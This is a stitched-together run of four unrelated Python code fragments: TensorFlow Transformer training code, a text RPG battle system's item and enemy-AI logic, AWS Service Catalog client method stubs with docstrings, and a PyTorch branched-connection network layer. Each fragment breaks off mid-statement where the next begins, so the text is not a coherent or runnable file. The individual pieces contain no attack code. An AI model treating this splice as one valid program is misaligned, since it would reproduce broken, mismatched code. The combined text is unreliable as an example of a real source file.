logging.info("Train history: {}".format(history.history))
print("End train iteration:{}/{} global step:{}".format(
i,
iterations,
i*flags_obj.steps_between_evals))
if (flags_obj.bleu_source and flags_obj.bleu_ref):
uncased_score, cased_score = self.eval()
cased_score_history.append([i, cased_score])
uncased_score_history.append([i, uncased_score])
stats = ({
"loss": train_loss
} if history is None else misc.build_stats(history, callbacks))
if uncased_score and cased_score:
stats["bleu_uncased"] = uncased_score
stats["bleu_cased"] = cased_score
stats["bleu_uncased_history"] = uncased_score_history
stats["bleu_cased_history"] = cased_score_history
return stats
def eval(self):
"""Evaluates the model."""
if not self.predict_model:
self.predict_model = transformer.create_model(self.params, False)
self._load_weights_if_possible(
self.predict_model,
tf.train.latest_checkpoint(self.flags_obj.model_dir))
self.predict_model.summary()
return evaluate_and_log_bleu(
self.predict_model, self.params, self.flags_obj.bleu_source,
self.flags_obj.bleu_ref, self.flags_obj.vocab_file,
self.distribution_strategy if self.use_tpu else None)
def predict(self):
"""Predicts result from the model."""
params = self.params
flags_obj = self.flags_obj
with tf.name_scope("model"):
model = transformer.create_model(params, is_train=False)
self._load_weights_if_possible(
model, tf.train.latest_checkpoint(self.flags_obj.model_dir))
model.summary()
subtokenizer = tokenizer.Subtokenizer(flags_obj.vocab_file)
ds = data_pipeline.eval_input_fn(params)
ds = ds.map(lambda x, y: x).take(_SINGLE_SAMPLE)
ret = model.predict(ds)
val_outputs, _ = ret
length = len(val_outputs)
for i in range(length):
translate.translate_from_input(val_outputs[i], subtokenizer)
def _create_callbacks(self, cur_log_dir, init_steps, params):
"""Creates a list of callbacks."""
sfunc = optimizer.LearningRateFn(params["learning_rate"],
params["hidden_size"],
params["learning_rate_warmup_steps"])
scheduler_callback = optimizer.LearningRateScheduler(sfunc, init_steps)
callbacks = misc.get_callbacks()
callbacks.append(scheduler_callback)
ckpt_full_path = os.path.join(cur_log_dir, "cp-{epoch:04d}.ckpt")
callbacks.append(tf.keras.callbacks.ModelCheckpoint(ckpt_full_path,
save_weights_only=True))
return callbacks
def _load_weights_if_possible(self, model, init_weight_path=None):
"""Loads model weights when it is provided."""
if init_weight_path:
logging.info("Load weights: {}".format(init_weight_path))
# TODO(b/139414977): Having the same variable restoring method for both
# TPU and GPU.
if self.use_tpu:
checkpoint = tf.train.Checkpoint(
model=model, optimizer=self._create_optimizer())
checkpoint.restore(init_weight_path)
else:
model.load_weights(init_weight_path)
else:
print("Weights not loaded from path:{}".format(init_weight_path))
def _create_optimizer(self):
"""Creates optimizer."""
params = self.params
# TODO(b/139414679): Explore the difference between using
# LearningRateSchedule and callback for GPU runs, and try to merge them.
lr_schedule = optimizer.LearningRateSchedule(
params["learning_rate"], params["hidden_size"],
params["learning_rate_warmup_steps"])
opt = tf.keras.optimizers.Adam(
lr_schedule if self.use_tpu else params["learning_rate"],
params["optimizer_adam_beta1"],
params["optimizer_adam_beta2"],
epsilon=params["optimizer_adam_epsilon"])
if params["dtype"] == tf.float16:
opt = tf.keras.mixed_precision.experimental.LossScaleOptimizer(
opt, loss_scale=flags_core.get_loss_scale(self.flags_obj,
default_for_fp16="dynamic"))
if self.flags_obj.fp16_implementation == "graph_rewrite":
# Note: when flags_obj.fp16_implementation == "graph_rewrite",
# dtype as | |
+ 1}: {temp_stat_changes[i][2].name}")
print(f"Description: '{temp_stat_changes[i][2].dscrpt}'\n")
print(f"Turns left: {temp_stat_changes[i][0] - self.battle_dict['turn_counter']}")
print(f"Health Modifier: {temp_stat_changes[i][1][Stat_Sheet.health] * -1}\n" if temp_stat_changes[i][1][Stat_Sheet.health] != 0 else '', end='')
print(f"Strength Modifier: {temp_stat_changes[i][1][Stat_Sheet.strength] * -1}\n" if temp_stat_changes[i][1][Stat_Sheet.strength] != 0 else '', end='')
print(f"Armor Modifier: {temp_stat_changes[i][1][Stat_Sheet.armor] * -1}\n" if temp_stat_changes[i][1][Stat_Sheet.armor] != 0 else '', end='')
print(f"Agility Modifier: {temp_stat_changes[i][1][Stat_Sheet.agility] * -1}\n" if temp_stat_changes[i][1][Stat_Sheet.agility] != 0 else '', end='')
print(f"Power Modifier: {temp_stat_changes[i][1][Stat_Sheet.power] * -1}" if temp_stat_changes[i][1][Stat_Sheet.power] != 0 else '', end='')
print()
del temp_stat_changes
if self.effect_dict['reverse_effect_enemy'] != []:
print('\nEnemy Status Effects:\n------------------------')
temp_stat_changes = self.effect_dict['reverse_effect_enemy']
for i in range(len(temp_stat_changes)):
print(f"Effect {i + 1}: {temp_stat_changes[i][2].name}")
print(f"Description: '{temp_stat_changes[i][2].dscrpt}'\n")
print(f"Turns left: {temp_stat_changes[i][0] - self.battle_dict['turn_counter']}")
print(f"Health Modifier: {temp_stat_changes[i][1][Stat_Sheet.health] * -1}\n" if temp_stat_changes[i][1][Stat_Sheet.health] != 0 else '', end='')
print(f"Strength Modifier: {temp_stat_changes[i][1][Stat_Sheet.strength] * -1}\n" if temp_stat_changes[i][1][Stat_Sheet.strength] != 0 else '', end='')
print(f"Armor Modifier: {temp_stat_changes[i][1][Stat_Sheet.armor] * -1}\n" if temp_stat_changes[i][1][Stat_Sheet.armor] != 0 else '', end='')
print(f"Agility Modifier: {temp_stat_changes[i][1][Stat_Sheet.agility] * -1}\n" if temp_stat_changes[i][1][Stat_Sheet.agility] != 0 else '', end='')
print(f"Power Modifier: {temp_stat_changes[i][1][Stat_Sheet.power] * -1}" if temp_stat_changes[i][1][Stat_Sheet.power] != 0 else '', end='')
print()
del temp_stat_changes
input(self.battle_dict['continue_prompt'])
def attack_use_debuff(self, target, debuff):
if isinstance(debuff, stat_item):
self.calc_effect_queue(target, debuff)
self.use_item_stat(target, debuff.stat_changes)
def use_item(self, thing, itm):
# if itm.stat_changes != [0, 0, 0, 0, 0]:
# Add above check to the item list generator
if itm in thing.collection.items:
try:
# Add specific instructions for healing items
if isinstance(itm, heal_item):
if thing.stats.health + itm.heal_amnt > thing.stats.max_health:
thing.stats.health = thing.stats.max_health
else:
thing.stats.health += itm.heal_amnt
write(f"{thing.name} used a {itm.name}, and regained {itm.heal_amnt} health.")
elif isinstance(itm, stat_item):
self.calc_effect_queue(thing, itm)
self.use_item_stat(thing, itm.stat_changes)
write(f"{thing.name} used a {itm.name}.")
thing.collection.rem_item(itm)
except ValueError:
print(f"This item does not exist in {thing.name}'s inventory.")
def chance_item(self, enemy):
enemy_has_stat_items = [isinstance(i, stat_item) for i in enemy.collection.items]
enemy_has_heal_items = [isinstance(i, heal_item) for i in enemy.collection.items]
if (True in enemy_has_stat_items) and (self.battle_dict['ai']['used_item'] > 0):
return round((100) / (1 + (self.e ** ((-1 / 2) * self.battle_dict['ai']['used_item']))) - 50)
elif (True in enemy_has_heal_items) and (self.battle_dict['ai']['used_item'] > 0):
return self.chance_heal(enemy)
else:
return 0
def percent_health(self, thing):
return ((thing.stats.health / thing.stats.max_health) * 100)
def chance_heal(self, enemy):
enemy_has_heal_items = [isinstance(i, heal_item) for i in enemy.collection.items]
if (True in enemy_has_heal_items) and (self.percent_health(enemy) <= 80):
return round(-25719423 + (89.67716 - -25719430)/(1 + ((self.percent_health(enemy) / 1720762) ** 1.286616)))
else:
return 0
def switch_turn(self, power_data, enemy_used_item=False):
if self.battle_dict['power_counter'] < power_data:
self.battle_dict['power_counter'] += 1
else:
# Reset temporary power counter
self.battle_dict['power_counter'] = 1
if self.battle_dict['turn'] == Turn.Attack:
if self.battle_dict['first_turn'] == Turn.Defend:
self.battle_dict['turn_counter'] += 1
# Switch turn
self.battle_dict['turn'] = Turn.Defend
# Exit turn
raise TurnComplete
elif self.battle_dict['turn'] == Turn.Defend:
if self.battle_dict['first_turn'] == Turn.Attack:
self.battle_dict['turn_counter'] += 1
# Switch turn
self.battle_dict['turn'] = Turn.Attack
# Do extras based on item use
if enemy_used_item is True:
self.battle_dict['ai']['used_item'] = 0
else:
self.battle_dict['ai']['used_item'] += 1
# Exit turn
raise TurnComplete
else:
debug_info(ValueError('The turn counter was not set correctly.'), 'Somehow, the value of turn was switched away from 0 or 1, which are the accepted values.')
def hit_animate(self):
from time import sleep
cli_color('setterm --inversescreen on', 'color F0')
sleep(.2)
cli_color('setterm --inversescreen off')
sleep(.1)
cli_color('setterm --inversescreen on', 'color F0')
sleep(.03)
cli_color('setterm --inversescreen off')
sleep(.03)
cli_color('setterm --inversescreen on', 'color F0')
sleep(.03)
cli_color('setterm --inversescreen off')
def draw_hp(self, plyr, enemy):
clr_console()
prcnt_plyr_health = round(self.percent_health(plyr) / 2)
print(f'{plyr.name}: [', end='')
for i in range(50):
print('=' if i <= prcnt_plyr_health else '-', end='')
print(f"] ({plyr.stats.health}/{plyr.stats.max_health})")
del prcnt_plyr_health
prcnt_enemy_health = round(self.percent_health(enemy) / 2)
print(f'{enemy.name}: [', end='')
for i in range(50):
print('=' if i <= prcnt_enemy_health else '-', end='')
print(']')
del prcnt_enemy_health
def item_info(self, itm):
print(f"\n{itm.name}")
# Create barrier from name length
for i in itm.name:
print('-', end='')
print(f'\nDescription: "{itm.dscrpt}"')
if isinstance(itm, heal_item):
print('Type: Healing Item')
print(f"Heal Amount: {itm.heal_amnt}")
else:
print('\nType: Buff Item')
print(f"Turns Effective: {itm.duration}\n")
print(f"HP Modifier: {itm.stat_changes[Stat_Sheet.health]}\n" if itm.stat_changes[Stat_Sheet.health] != 0 else '', end='')
print(f"Strength Modifier: {itm.stat_changes[Stat_Sheet.strength]}\n" if itm.stat_changes[Stat_Sheet.strength] != 0 else '', end='')
print(f"Armor Modifier: {itm.stat_changes[Stat_Sheet.armor]}\n" if itm.stat_changes[Stat_Sheet.armor] != 0 else '', end='')
print(f"Agility Modifier: {itm.stat_changes[Stat_Sheet.agility]}\n" if itm.stat_changes[Stat_Sheet.agility] != 0 else '', end='')
print(f"Power Modifier: {itm.stat_changes[Stat_Sheet.power]}" if itm.stat_changes[Stat_Sheet.power] != 0 else '', end='')
def plyr_choose_item(self, plyr):
# Writeout valid items
valid_items = []
temp_index = 1
for i in range(len(plyr.collection.items)):
if isinstance(plyr.collection.items[i], heal_item) or isinstance(plyr.collection.items[i], stat_item):
print(f"{temp_index}. {plyr.collection.items[i].name}")
valid_items.append((temp_index, plyr.collection.items[i]))
temp_index += 1
if valid_items == []:
print('\nYou have no items to use.')
input(self.battle_dict['continue_prompt'])
raise ChooseAgain
print('\nEnter a number to use an item. \nType "info [number]" for more info about the item.\nType "q" to return to the previous menu.')
while True:
user_choice = str(input('\nChoice: '))
try:
# Determine action based on input
if "info" in user_choice:
for i in valid_items:
if i[0] == int(user_choice.split(' ')[1]):
self.item_info(i[1])
elif user_choice.lower() == 'q':
raise ChooseAgain
else:
# Convert user_choice to indexable integer
user_choice = int(user_choice)
# Try to access the selected attack and return it
for i in valid_items:
if i[0] == user_choice:
return i[1]
except (ValueError, IndexError, AttributeError):
print('Invalid input.')
def attack_info(self, collection, attack):
print(f"\n{attack.name}")
# Create barrier from name length
for i in attack.name:
print('-', end='')
print(f'\nDescription: "{attack.dscrpt}"')
print(f"Damage: {attack.dmg}")
print(f"Accuracy {attack.hit_rate}%")
try:
print(f"Ammo: {attack.ammo_type.name}")
print(f"Ammo Cost: {attack.ammo_cost} ({collection.count(attack.ammo_type)} in inventory)")
except AttributeError:
pass
try:
print(f"Debuff Effect: {attack.debuff.name}")
except AttributeError:
pass
def plyr_choose_attack(self, plyr):
print()
for i in range(len(plyr.attacks)):
print(f"{i + 1}. {plyr.attacks[i].name}")
# Prompt user
print('\nEnter a number to attack. \nType "info [number]" for more info about the attack.\nType "q" to return to the previous menu.')
while True:
user_choice = str(input('\nChoice: '))
try:
# Determine action based on input
if "info" in user_choice:
self.attack_info(plyr.collection.items, plyr.attacks[int(user_choice.split(' ')[1]) - 1])
elif user_choice.lower() == 'q':
raise ChooseAgain
else:
# Convert user_choice to indexable integer
user_choice = int(user_choice) - 1
try:
req_ammo = plyr.collection.items.count(plyr.attacks[user_choice].ammo_type)
if (plyr.attacks[user_choice].ammo_type in plyr.collection.items) and (req_ammo >= plyr.attacks[user_choice].ammo_cost):
return plyr.attacks[user_choice]
else:
print(f"You don't have enough {plyr.attacks[user_choice].ammo_type.name}s to use this attack.")
except AttributeError:
return plyr.attacks[user_choice]
except (ValueError, IndexError, AttributeError):
print('Invalid input.')
def enemy_use_heal_item(self, enemy):
# Use healing item
heals_ordered_best = []
# Generate list of healing items that don't overheal the enemy
for heal in enemy.collection.items:
if isinstance(heal, heal_item) and (enemy.stats.health + heal.heal_amnt <= enemy.stats.max_health):
heals_ordered_best.append((heal.heal_amnt, heal))
if heals_ordered_best != []:
# Order them by what item will heal them the most
heals_ordered_best.sort(reverse=True)
# Use the item
self.use_item(enemy, heals_ordered_best[0][1])
# Delete unneeded var
del heals_ordered_best
return True
# Create list of healing items and sort them based on how effective they are
temp_heal_list = []
for heal in enemy.collection.items:
if isinstance(heal, heal_item):
temp_heal_list.append((heal.heal_amnt, heal))
temp_heal_list.sort()
# Use item and display its use
write(f"{enemy.name} used a {temp_heal_list[0][1].name} and regained {enemy.stats.max_health - enemy.stats.health} health.")
self.use_item(enemy, temp_heal_list[0][1])
# Finish up
del temp_heal_list
del heals_ordered_best
return True
def enemy_use_item(self, enemy):
# Use item #
# Generate random number
enemy_choice = self.randnum(100)
# Check if there are valid items or not
valid_stat_items = (isinstance(itm, stat_item) for itm in enemy.collection.items)
if (enemy_choice <= self.chance_heal(enemy)) or all(check is False for check in valid_stat_items):
self.enemy_use_heal_item(enemy)
else:
# Use buff item
# Generate list of places in inventory where buff items exist
temp_stat_items = []
for i in range(len(enemy.collection.items)):
if isinstance(enemy.collection.items[i], stat_item):
temp_stat_items.append(i)
# Randomly select buff from list of places in inventory
enemy_choice = self.randnum(len(temp_stat_items) - 1, 0)
buff_choice = enemy.collection.items[temp_stat_items[enemy_choice]]
# Tell player and use buff
write(f"{enemy.name} used a {buff_choice.name}.")
self.use_item(enemy, buff_choice)
del temp_stat_items
return True
def enemy_determine_attack(self, enemy):
while True:
random_attack = enemy.attacks[self.randnum(len(enemy.attacks)) - 1]
if isinstance(random_attack, ammo_attack):
req_items = 0
for itm in enemy.collection.items:
if itm is random_attack.ammo_type:
req_items += 1
if req_items >= random_attack.ammo_cost:
return random_attack
elif isinstance(random_attack, ammo_attack) is False:
return random_attack
@abstractmethod
def player_win(self, plyr, enemy):
# The player wins
"""
This method is defined by users of Gilbo. If the player wins battle(), this method is called. Whether they loot the enemy, or gain experience, it must be defined here.
"""
@abstractmethod
def player_lose(self, plyr, enemy):
# The player loses
"""
This method is defined by users of Gilbo. If the player loses battle(), this method is called. Whether they lose money and respawn, or get booted out to the last time they saved, it must be defined here.
"""
def battle(self, plyr, enemy, spec_effect=None, music=None):
| |
PageSize:
The maximum number of items to return with this call.
:rtype: dict
:returns:
"""
pass
def list_portfolios_for_product(self, ProductId: str, AcceptLanguage: str = None, PageToken: str = None, PageSize: int = None) -> Dict:
"""
Lists all portfolios that the specified product is associated with.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/servicecatalog-2015-12-10/ListPortfoliosForProduct>`_
**Request Syntax**
::
response = client.list_portfolios_for_product(
AcceptLanguage='string',
ProductId='string',
PageToken='string',
PageSize=123
)
**Response Syntax**
::
{
'PortfolioDetails': [
{
'Id': 'string',
'ARN': 'string',
'DisplayName': 'string',
'Description': 'string',
'CreatedTime': datetime(2015, 1, 1),
'ProviderName': 'string'
},
],
'NextPageToken': 'string'
}
**Response Structure**
- *(dict) --*
- **PortfolioDetails** *(list) --*
Information about the portfolios.
- *(dict) --*
Information about a portfolio.
- **Id** *(string) --*
The portfolio identifier.
- **ARN** *(string) --*
The ARN assigned to the portfolio.
- **DisplayName** *(string) --*
The name to use for display purposes.
- **Description** *(string) --*
The description of the portfolio.
- **CreatedTime** *(datetime) --*
The UTC time stamp of the creation time.
- **ProviderName** *(string) --*
The name of the portfolio provider.
- **NextPageToken** *(string) --*
The page token to use to retrieve the next set of results. If there are no additional results, this value is null.
:type AcceptLanguage: string
:param AcceptLanguage:
The language code.
* ``en`` - English (default)
* ``jp`` - Japanese
* ``zh`` - Chinese
:type ProductId: string
:param ProductId: **[REQUIRED]**
The product identifier.
:type PageToken: string
:param PageToken:
The page token for the next set of results. To retrieve the first set of results, use null.
:type PageSize: integer
:param PageSize:
The maximum number of items to return with this call.
:rtype: dict
:returns:
"""
pass
def list_principals_for_portfolio(self, PortfolioId: str, AcceptLanguage: str = None, PageSize: int = None, PageToken: str = None) -> Dict:
"""
Lists all principal ARNs associated with the specified portfolio.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/servicecatalog-2015-12-10/ListPrincipalsForPortfolio>`_
**Request Syntax**
::
response = client.list_principals_for_portfolio(
AcceptLanguage='string',
PortfolioId='string',
PageSize=123,
PageToken='string'
)
**Response Syntax**
::
{
'Principals': [
{
'PrincipalARN': 'string',
'PrincipalType': 'IAM'
},
],
'NextPageToken': 'string'
}
**Response Structure**
- *(dict) --*
- **Principals** *(list) --*
The IAM principals (users or roles) associated with the portfolio.
- *(dict) --*
Information about a principal.
- **PrincipalARN** *(string) --*
The ARN of the principal (IAM user, role, or group).
- **PrincipalType** *(string) --*
The principal type. The supported value is ``IAM`` .
- **NextPageToken** *(string) --*
The page token to use to retrieve the next set of results. If there are no additional results, this value is null.
:type AcceptLanguage: string
:param AcceptLanguage:
The language code.
* ``en`` - English (default)
* ``jp`` - Japanese
* ``zh`` - Chinese
:type PortfolioId: string
:param PortfolioId: **[REQUIRED]**
The portfolio identifier.
:type PageSize: integer
:param PageSize:
The maximum number of items to return with this call.
:type PageToken: string
:param PageToken:
The page token for the next set of results. To retrieve the first set of results, use null.
:rtype: dict
:returns:
"""
pass
def list_provisioned_product_plans(self, AcceptLanguage: str = None, ProvisionProductId: str = None, PageSize: int = None, PageToken: str = None, AccessLevelFilter: Dict = None) -> Dict:
"""
Lists the plans for the specified provisioned product or all plans to which the user has access.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/servicecatalog-2015-12-10/ListProvisionedProductPlans>`_
**Request Syntax**
::
response = client.list_provisioned_product_plans(
AcceptLanguage='string',
ProvisionProductId='string',
PageSize=123,
PageToken='string',
AccessLevelFilter={
'Key': 'Account'|'Role'|'User',
'Value': 'string'
}
)
**Response Syntax**
::
{
'ProvisionedProductPlans': [
{
'PlanName': 'string',
'PlanId': 'string',
'ProvisionProductId': 'string',
'ProvisionProductName': 'string',
'PlanType': 'CLOUDFORMATION',
'ProvisioningArtifactId': 'string'
},
],
'NextPageToken': 'string'
}
**Response Structure**
- *(dict) --*
- **ProvisionedProductPlans** *(list) --*
Information about the plans.
- *(dict) --*
Summary information about a plan.
- **PlanName** *(string) --*
The name of the plan.
- **PlanId** *(string) --*
The plan identifier.
- **ProvisionProductId** *(string) --*
The product identifier.
- **ProvisionProductName** *(string) --*
The user-friendly name of the provisioned product.
- **PlanType** *(string) --*
The plan type.
- **ProvisioningArtifactId** *(string) --*
The identifier of the provisioning artifact.
- **NextPageToken** *(string) --*
The page token to use to retrieve the next set of results. If there are no additional results, this value is null.
:type AcceptLanguage: string
:param AcceptLanguage:
The language code.
* ``en`` - English (default)
* ``jp`` - Japanese
* ``zh`` - Chinese
:type ProvisionProductId: string
:param ProvisionProductId:
The product identifier.
:type PageSize: integer
:param PageSize:
The maximum number of items to return with this call.
:type PageToken: string
:param PageToken:
The page token for the next set of results. To retrieve the first set of results, use null.
:type AccessLevelFilter: dict
:param AccessLevelFilter:
The access level to use to obtain results. The default is ``User`` .
- **Key** *(string) --*
The access level.
* ``Account`` - Filter results based on the account.
* ``Role`` - Filter results based on the federated role of the specified user.
* ``User`` - Filter results based on the specified user.
- **Value** *(string) --*
The user to which the access level applies. The only supported value is ``Self`` .
:rtype: dict
:returns:
"""
pass
def list_provisioning_artifacts(self, ProductId: str, AcceptLanguage: str = None) -> Dict:
"""
Lists all provisioning artifacts (also known as versions) for the specified product.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/servicecatalog-2015-12-10/ListProvisioningArtifacts>`_
**Request Syntax**
::
response = client.list_provisioning_artifacts(
AcceptLanguage='string',
ProductId='string'
)
**Response Syntax**
::
{
'ProvisioningArtifactDetails': [
{
'Id': 'string',
'Name': 'string',
'Description': 'string',
'Type': 'CLOUD_FORMATION_TEMPLATE'|'MARKETPLACE_AMI'|'MARKETPLACE_CAR',
'CreatedTime': datetime(2015, 1, 1),
'Active': True|False
},
],
'NextPageToken': 'string'
}
**Response Structure**
- *(dict) --*
- **ProvisioningArtifactDetails** *(list) --*
Information about the provisioning artifacts.
- *(dict) --*
Information about a provisioning artifact (also known as a version) for a product.
- **Id** *(string) --*
The identifier of the provisioning artifact.
- **Name** *(string) --*
The name of the provisioning artifact.
- **Description** *(string) --*
The description of the provisioning artifact.
- **Type** *(string) --*
The type of provisioning artifact.
* ``CLOUD_FORMATION_TEMPLATE`` - AWS CloudFormation template
* ``MARKETPLACE_AMI`` - AWS Marketplace AMI
* ``MARKETPLACE_CAR`` - AWS Marketplace Clusters and AWS Resources
- **CreatedTime** *(datetime) --*
The UTC time stamp of the creation time.
- **Active** *(boolean) --*
Indicates whether the product version is active.
- **NextPageToken** *(string) --*
The page token to use to retrieve the next set of results. If there are no additional results, this value is null.
:type AcceptLanguage: string
:param AcceptLanguage:
The language code.
* ``en`` - English (default)
* ``jp`` - Japanese
* ``zh`` - Chinese
:type ProductId: string
:param ProductId: **[REQUIRED]**
The product identifier.
:rtype: dict
:returns:
"""
pass
def list_provisioning_artifacts_for_service_action(self, ServiceActionId: str, PageSize: int = None, PageToken: str = None, AcceptLanguage: str = None) -> Dict:
"""
Lists all provisioning artifacts (also known as versions) for the specified self-service action.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/servicecatalog-2015-12-10/ListProvisioningArtifactsForServiceAction>`_
**Request Syntax**
::
response = client.list_provisioning_artifacts_for_service_action(
ServiceActionId='string',
PageSize=123,
PageToken='string',
AcceptLanguage='string'
)
**Response Syntax**
::
{
'ProvisioningArtifactViews': [
{
'ProductViewSummary': {
'Id': 'string',
'ProductId': 'string',
'Name': 'string',
'Owner': 'string',
'ShortDescription': 'string',
'Type': 'CLOUD_FORMATION_TEMPLATE'|'MARKETPLACE',
'Distributor': 'string',
'HasDefaultPath': True|False,
'SupportEmail': 'string',
'SupportDescription': 'string',
'SupportUrl': 'string'
},
'ProvisioningArtifact': {
'Id': 'string',
'Name': 'string',
'Description': 'string',
'CreatedTime': datetime(2015, 1, 1)
}
},
],
'NextPageToken': 'string'
}
**Response Structure**
- *(dict) --*
- **ProvisioningArtifactViews** *(list) --*
An array of objects with information about product views and provisioning artifacts.
- *(dict) --*
An object that contains summary information about a product view and a provisioning artifact.
- **ProductViewSummary** *(dict) --*
Summary information about a product view.
- **Id** *(string) --*
The product view identifier.
- **ProductId** *(string) --*
The product identifier.
- **Name** *(string) --*
| |
allocated. Default is GPU if
available, otherwise CPU.
dropout: The proportion of dropout to use for this layer, default 0.0.
mean: The mean of the normal distribution to initialize weights, default 0.0.
std: The standard deviation of the normal distribution to initialize weights, default 0.05.
activation: The activation function to use between layers. Default is sigmoid.
last: Whether the layer is the final layer in the model or not, default False. If True, the
forward output is a (10, -1) tensor representing the raw, unnormalized scores of the
ten-digit "keypad" (refer to thesis, Figure 3-3 and associated text) ready for cross
entropy loss.
Attributes:
width (int): The side length of the layer.
hw (int): The product of the layer's height and width, namely ``width * width`` in this
version of BCN.
connections (Connections): The number of direct connections each neuron makes.
branches (Branches): The type of indirect (branching) connections used to construct the
branching network.
device (torch.device): The ``torch.device`` object on which the tensors will be allocated.
Default is GPU if available, otherwise CPU.
dropout (torch.nn.Dropout): The torch Dropout module use when training.
mean (float): The mean of the normal distribution used to initialize weights.
std (float): The standard deviation of the normal distribution used to initialize weights.
activation: The activation function used between layers.
last (bool): Whether the layer is the final layer in the model or not. If ``True``, the
forward output is a (10, -1) tensor representing the raw, unnormalized scores of the
ten-digit "keypad" (refer to thesis, Figure 3-3 and associated text) ready for cross
entropy loss.
ells (range): A range of offsets, centered around 0, used for the direct connections. For
example, 1-to-25 connections will range from -2 to +2 inclusive, because this represents
a span of width 5.
network (Dict[Tuple[int,int],torch.Tensor]): In future versions, this will probably be a
tensor for performance reasons. I'll hold off on complete documentation for now.
weights (Dict[Tuple[int,int],torch.nn.Parameter]): In future versions, this will probably be a
tensor for performance reasons. I'll hold off on complete documentation for now.
mask (Optional[torch.Tensor]): If this is a last layer, the mask attribute represents a
tensor that filters the output to ten values. ``None`` if this is not a last layer.
"""
def __init__(self, width: int, *,
connections: Connections=Connections.ONE_TO_9,
branches: Optional[Branches]=None,
device: Optional[torch.device]=None,
dropout: float=0.0,
mean: float=0.0,
std: float=0.05,
activation=torch.sigmoid,
last: bool=False,
):
super().__init__()
# remember args
self.height = width
self.width = width
self.hw = self.height*self.width
self.connections = connections
if branches is not None:
self.branches = branches
else:
self.branches = DirectOnly()
if connections == Connections.FULLY_CONNECTED:
ell = (branches.width-1)//2
else:
ell = (int(math.sqrt(connections.value))-1)//2
self.ells = range(-ell, ell+1)
self.device = DEV if device is None else device
self.activation = activation
self.last = last
# check if the connection matrices are already available locally under ./networks/
fname = Path("./networks/") / self.default_network_filename
if fname.exists():
# yay!
self.network = torch.load(fname, map_location=device)
else:
# construct connection matrices
self.network = BCN.construct_network(
self.width,
self.connections,
self.branches,
device=device
)
# save for later
Path("./networks/").mkdir(exist_ok=True)
torch.save(self.network, fname)
# initialize weights v1.0
c = self.hw if self.connections == Connections.FULLY_CONNECTED else self.connections.value
self.weights = nn.Parameter(
torch.Tensor(c, self.hw, 1, device=device)
)
nn.init.normal_(self.weights, mean=mean, std=std)
#self.register_parameter(f"({dy},{dx})", self.weights[dy,dx])
# dropout
self.dropout = nn.Dropout(p=dropout)
# if last
if last:
self.mask = torch.zeros((width,width)).bool().to(device)
i = (width-3)//2
self.mask[i:i+3,i:i+3] = True
self.mask[i+3,i+1] = True
self.mask = self.mask.reshape((self.hw,1))
else:
self.mask = None
def __repr__(self):
return (
f"{self.__class__.__name__}<"
f"{self.height}x{self.width}"
f"@{self.connections.value}-{self.branches}"
f">"
)
@property
def default_network_filename(self) -> str:
"""The way this model's network file will be named by default.
Example:
``[email protected]``
"""
return (
f"{self.height}x{self.width}"
f"@{self.connections.value}"
f"-{self.branches}"
f".{self.device.type}"
f".pt"
)
def forward(self, x: torch.Tensor) -> torch.Tensor:
"""The forward computation performed at every BCNLayer call.
Note:
Call the BCNLayer instance itself instead of using this method directly.
Args:
x: The input tensor of size (``features``, ``batch_size``).
Returns:
The output tensor. Size is (``features``, ``batch_size``) if this layer is not the
last layer, otherwise (10, ``batch_size``).
"""
y = torch.matmul(self.network, x * self.weights) # (c, hw, batch_size)
y = y.sum(0) # (hw, batch_size)
y = self.dropout(y)
if self.last:
batch_size = y.size()[-1]
y = torch.masked_select(y, self.mask)
y = y.reshape((10,batch_size))
y = torch.transpose(y, 0, 1) # CrossEntropyLoss has batch first
else:
y = self.activation(y)
return y
class BCN(nn.Module):
"""Represents a branched connection network.
Args:
width: The side length of each layer.
depth: The depth of the network, equal to the number of nonlinear activations.
Keyword Args:
connections: The number of direct connections each neuron makes. Default is 1-to-9.
branches: The type of indirect (branching) connections used to construct the branching
networks for each layer. Default is direct connections only.
device: The `torch.device` object on which the tensors will be allocated. Default is GPU if
available, otherwise CPU.
mean: The mean of the normal distribution to initialize weights, default 0.0.
std: The standard deviation of the normal distribution to initialize weights, default 0.05.
dropout: The dropout factor to use for each layer; default 0.0. If provided a tuple of
floats, use the values for the corresponding layer. For example, (0, 0.3, 0.5) will set
the dropout of the third layer (and following layers if there are any) to 0.5, whereas the
first and second layers will have dropouts of 0 and 0.3 respectively.
activation: The activation function to use between layers. Default is sigmoid.
verbose: Verbosity level. 0 (default) is no text, 1 is some, 2 is most verbose. Might become
deprecated in future versions.
Attributes:
width (int): The side length of each layer.
hw (int): The product of each layer's height and width, namely ``width * width`` in this
version of BCN.
depth (int): The depth of the network, equal to the number of nonlinear activations.
connections (Connections): The number of direct connections each neuron makes.
branches (Branches): The type of indirect (branching) connections used to construct the
branching networks for each layer. Default is direct connections only.
device (torch.device): The `torch.device` object on which the tensors will be allocated.
mean (float): The mean of the normal distribution used to initialize weights.
std (float): The standard deviation of the normal distribution used to initialize weights.
dropout (Tuple[float,...]): The proportion of dropout to use for each layer, as a tuple of
floats corresponding to the first layer, second, and so on. If the length of this tuple is
less than the number of layers, then the reamining layers use the last value in the tuple.
activation: The activation function used between layers.
verbose (int): Verbosity level. 0 (default) is no text, 1 is some, 2 is most verbose. Might
become deprecated in future versions.
trial (Optional[int]): The trial of this model experiment, specified by the BCN.train method.
Used when naming the weights & results files. If ``None``, this model does not represent
any particular trial.
scheme (Optional[TrainingScheme]): The training scheme to use when training this model.
Specified by the BCN.train method.
save_path (Optional[~pathlib.Path]): The path to save weights & results so, specified with the
BCN.train method.
results (Results): The model training results.
layers (~torch.nn.ModuleList): The list of BCNLayer layers.
"""
def __init__(self, width: int, depth: int, *,
connections: Connections=Connections.ONE_TO_9,
branches: Optional[Branches]=None,
device: Optional[torch.device]=None,
mean: float=0.0,
std: float=0.05,
dropout: Union[Tuple[float,...],float]=0.0,
activation=torch.sigmoid,
verbose: int=0,
**kwargs
):
if depth < 1: raise ValueError(f"Depth must be at least 1; given: {depth}.")
super().__init__()
# remember args
self.height = width
self.width = width
self.hw = self.height*self.width
self.depth = depth
self.connections = connections
if branches is not None:
self.branches = branches
else:
self.branches = DirectOnly()
self.save_path = None
self.trial = None
if verbose: print(f"Building BCN model {self.__repr__()}...")
self.device = DEV if device is None else device
self.verbose = verbose
# set up training scheme and results attributes
